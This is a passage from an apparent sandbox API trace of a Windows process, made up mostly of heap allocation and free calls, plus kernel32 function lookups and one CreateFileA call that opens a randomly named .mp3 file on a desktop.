(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0162.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0162.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0162.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0162.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0162.291] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0162.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.293] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0162.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd9d8 [0162.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd9d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0162.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.294] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0162.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0162.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd9d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0162.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.294] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0162.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0162.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0162.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0162.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x49) returned 0x923ad0 [0162.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3", cchWideChar=73, lpMultiByteStr=0x923ad0, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3", lpUsedDefaultChar=0x0) returned 73 [0162.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0162.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0162.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0162.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.296] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3\\urxyj_reg.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0162.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0162.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0162.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0162.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=73, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x92) returned 0x8feba8 [0162.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=73, lpWideCharStr=0x8feba8, cchWideChar=73 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3") returned 73 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0162.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0162.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.299] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.300] HeapFree (in: 